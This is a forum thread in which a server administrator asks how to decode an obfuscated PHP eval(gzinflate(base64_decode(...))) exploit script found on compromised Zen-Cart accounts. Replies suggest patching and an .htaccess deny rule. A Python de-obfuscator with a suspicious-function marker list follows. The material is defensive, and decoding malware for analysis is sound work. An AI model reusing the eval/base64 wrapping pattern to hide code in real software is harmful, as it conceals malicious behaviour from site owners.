Hi there guys,

I found tons of exploit scripts in a 777'ed directory on one of the accounts on my server. I'm plodding through them to see what they do, but one is encoded:

<?php /**/eval(base64_decode('...')); ?>
<?php

eval(gzinflate(base64_decode('FZq30oNatoQfZ84U
Ad7VRHhvhIfkFt57z9Pf/6RIwWbt1d1fq1Re6fBP/b
VTNaRH+U+W7iWB/V9R5nNR/vMfMdnkbvVisffBh
bhExgJ9hfzQae89veVvdWMr8K0XBx80Vi0+esB1oQ............

I've truncated it, but wanted to show how it's formed. Is there a way for me to unencode this file to see what it's trying to do?

Also, if anyone would like to take a look at these to help me figure out what might have happened, I would appreciate it. I don't want to post them for the obvious reasons, but have saved everything.

thanks,
json

    [man]base64_decode[/man]

    ALWAYS remove EVAL() statements or you could get burned

      Thanks very much for the link. Hadn't thought of it as php specific.

      Is there any way to use htaccess to block .php or .txt uploads in particular directories?

        you should restrict that in your upload code...

        However, you can use the Files directive in an .htaccess to make certain files unavailable:

        <Files ~ "\.(php|txt)$">
            # Apache 2.2 syntax; Apache 2.4 without mod_access_compat uses "Require all denied" instead
            Order allow,deny
            Deny from all
        </Files>
        
          scrupul0us;10935539 wrote:

          you should restrict that in your upload code...

          Thanks very much for the code. I've found these files on all accounts using the Zen-Cart e-commerce system. Unfortunately, I don't know how they're getting the files onto the server. I just know that all compromised accounts had this system in common.

          thanks again for your help,
          json

            I am dagon, thanks for thinking of it though. I can't figure out how they're getting the files onto the server. They were unable to run any of the scripts on my server, but on another that's not under my control, they were at the very least able to run a zen-specific script that I found. I've gone through the admin sessions and only found lost pw requests from my buddy in Brazil, but I've not got a clue what they were able to do outside the script at the server level.

            thanks,
            json

              You've already found the problem: Zen-Cart e-commerce system

              This you say is the only common denominator across all the sites with the exploit. Make sure that it is up-to-date with any security patches. If it is something provided by your hosting company, then you'll need to contact them about getting it fixed.

                I think it's an iframe virus.

                Just replace the eval with echo and add an inner htmlspecialchars( ... )

                and you will see what the code is doing, if I'm not mistaken.

                And this code is not often uploaded to your server; they're saving an incoming $_POST variable onto your server, or running that code after the form is posted.
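Both the original question (how to read the encoded file without running it) and the suggestion just above to swap eval for echo come down to the same step: undo the base64 and gzinflate layers statically and read the result. The script below is an added example for this thread, not code posted by anyone in it. It builds a harmless two-layer sample in the same shape as the posted file (constructed here; the thread's actual payload is not reproduced), then peels the layers with base64 and raw DEFLATE decoding only, so nothing is ever evaluated. The function names (`unwrap_all`, `suspicious_markers`, `build_sample`) are the example's own.

```python
import base64
import re
import zlib

# Constructed stand-in for the innermost code (not the thread's real payload).
INNER_PHP = 'echo "hello from the decoded layer";'

# PHP functions commonly chained to hide code; used for quick triage of other files.
MARKERS = ("eval", "base64_decode", "gzinflate", "gzuncompress", "str_rot13")


def _raw_deflate(data: bytes) -> bytes:
    """Raw DEFLATE output with no zlib header, which is what PHP's gzinflate() consumes."""
    c = zlib.compressobj(level=9, wbits=-zlib.MAX_WBITS)
    return c.compress(data) + c.flush()


def build_sample() -> str:
    """Wrap INNER_PHP in the two layers seen in the thread:
    eval(gzinflate(base64_decode(...))) inside eval(base64_decode(...))."""
    layer1 = "eval(gzinflate(base64_decode('%s')));" % (
        base64.b64encode(_raw_deflate(INNER_PHP.encode())).decode())
    return "<?php /**/eval(base64_decode('%s')); ?>" % (
        base64.b64encode(layer1.encode()).decode())


# Matches eval(base64_decode('...')) with an optional gzinflate(...) wrapper.
# Only these two decoders are recognised; anything else is left untouched.
_EVAL_RE = re.compile(
    r"eval\s*\(\s*(?P<gz>gzinflate\s*\(\s*)?base64_decode\s*\(\s*"
    r"['\"](?P<b64>[A-Za-z0-9+/=\s]+)['\"]\s*\)\s*(?(gz)\)\s*)\)\s*;?",
    re.DOTALL,
)


def unwrap_once(src: str):
    """Decode the first eval(...) layer found in src without executing anything.
    Returns (text_with_eval_replaced_by_its_decoded_code, found)."""
    m = _EVAL_RE.search(src)
    if not m:
        return src, False
    data = base64.b64decode(re.sub(r"\s+", "", m.group("b64")))
    if m.group("gz"):
        data = zlib.decompress(data, -zlib.MAX_WBITS)  # raw DEFLATE, like gzinflate()
    decoded = data.decode("utf-8", errors="replace")
    return src[: m.start()] + decoded + src[m.end():], True


def unwrap_all(src: str, max_layers: int = 20):
    """Peel eval(base64_decode(...)) / eval(gzinflate(base64_decode(...))) layers
    until none remain or max_layers is hit. Returns (plaintext, layers_removed)."""
    layers = 0
    while layers < max_layers:
        src, found = unwrap_once(src)
        if not found:
            break
        layers += 1
    return src, layers


def suspicious_markers(src: str):
    """Return the obfuscation-related function names present in src, for triage."""
    return sorted(name for name in MARKERS
                  if re.search(r"\b%s\s*\(" % name, src))


if __name__ == "__main__":
    sample = build_sample()
    print("markers before:", suspicious_markers(sample))
    plain, n = unwrap_all(sample)
    print("layers removed:", n)
    print(plain)
```

To use it on a real file, read the file into `src` and call `unwrap_all(src)`; look at the returned text in an editor rather than running it, since the whole point is to see what the script does without giving it a chance to do it. `suspicious_markers` is a cheap way to sort the rest of the directory into files worth a closer look.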
